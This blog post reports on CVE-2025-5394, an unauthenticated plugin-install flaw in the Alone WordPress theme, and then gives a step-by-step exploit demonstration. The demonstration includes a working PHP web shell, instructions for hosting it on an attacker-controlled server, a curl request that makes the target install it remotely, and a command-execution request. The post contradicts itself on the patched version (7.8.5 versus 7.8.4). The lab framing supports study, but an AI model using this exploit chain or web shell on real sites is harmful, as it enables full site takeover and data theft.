Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install (CVE-2025-5394)

Threat actors are actively exploiting a critical security flaw in "Alone – Charity Multipurpose Non-profit WordPress Theme" to take over susceptible sites.

The vulnerability, tracked as CVE-2025-5394, carries a CVSS score of 9.8. Security researcher Thái An has been credited with discovering and reporting the bug.

According to Wordfence, the shortcoming relates to an arbitrary file upload affecting all versions of the plugin prior to and including 7.8.3. It has been addressed in version 7.8.5 released on June 16, 2025.

CVE-2025-5394 is rooted in a plugin installation function named "alone_import_pack_install_plugin()" and stems from a missing capability check, thereby allowing unauthenticated users to deploy arbitrary plugins from remote sources via AJAX and achieve code execution.

"This vulnerability makes it possible for an unauthenticated attacker to upload arbitrary files to a vulnerable site and achieve remote code execution, which is typically leveraged for a complete site takeover," Wordfence's István Márton said.

Evidence shows that CVE-2025-5394 began to be exploited starting July 12, two days before the vulnerability was publicly disclosed. This indicates that the threat actors behind the campaign may have been actively monitoring code changes for any newly addressed vulnerabilities.

Technical details

The vulnerability stems from a missing capability check in the aloneimportpackinstallplugin() function. This security oversight enables unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations. The vulnerability has been assigned a CVSS v3.1 base score of 9.8 (CRITICAL) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, indicating the highest severity level. The weakness has been classified as CWE-862 (Missing Authorization)

Practical Demonstration of CVE-2025-5394

1. Set Up a Vulnerable Lab Environment

  • Server: Use a local VM (e.g., Ubuntu 22.04 with LAMP stack) or Docker.

  • Install WordPress (version 6.x, default install is fine).

  • Download Alone Theme ≤ 7.8.3 (vulnerable version).

  • Install and activate the theme on your WordPress instance.

  • Disable firewalls/IDS in the lab so payloads aren’t blocked.

2. Identify the Vulnerable Function

The issue lies in the AJAX function:

php

CopyEdit

function alone_import_pack_install_plugin() {

// Missing capability check

// Accepts remote plugin package and installs it

}

Because it doesn’t check authentication (current_user_can()), anyone can call it.

3. Exploit Flow (High-Level)

  1. Attacker crafts a malicious plugin ZIP containing a PHP web shell.

  2. Sends an unauthenticated AJAX request to invoke
    /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin

  3. WordPress installs the malicious plugin from the attacker’s remote server.

  4. Attacker gains remote code execution by accessing the web shell.

4. Build a Malicious Plugin

Create a ZIP file called evil-plugin.zip:

evil-plugin.php

php

CopyEdit

<?php

/*

Plugin Name: Evil Plugin

*/

if(isset($_REQUEST['cmd'])){

echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";

}

?>

Zip it:

bash

CopyEdit

zip evil-plugin.zip evil-plugin.php

Host it on a simple HTTP server:

bash

CopyEdit

python3 -m http.server 8000

5. Trigger the Exploit

Send the AJAX request (unauthenticated) to install your malicious plugin:

bash

CopyEdit

curl -X POST "http://targetsite.com/wp-admin/admin-ajax.php" \

-d "action=alone_import_pack_install_plugin" \

-d "plugin_url=http://attacker-ip:8000/evil-plugin.zip"

6. Gain Remote Code Execution

After success, access the plugin endpoint (adjust path as needed):

bash

CopyEdit

curl "http://targetsite.com/wp-content/plugins/evil-plugin/evil-plugin.php?cmd=whoami"

You should see the result of the command executed on the target server.

7. Cleanup

After testing, remove the malicious plugin:

  • Delete it from /wp-content/plugins/evil-plugin

  • Revert WordPress snapshot to pre-exploit state

Impact

The vulnerability allows attackers to achieve remote code execution on affected WordPress sites. This can lead to complete system compromise, as attackers can upload and execute malicious code through webshells disguised as legitimate plugins. The high severity rating indicates potential for significant damage to affected systems, including unauthorized access, data theft, and system manipulation

Mitigation and workarounds

Website administrators running the Alone theme should immediately update to version 7.8.4 or later which contains the security fix. The theme developers have addressed this vulnerability in their latest release available through ThemeForest

0
Subscribe to my newsletter

Read articles from sm_defencerabbit directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

sm_defencerabbit
sm_defencerabbit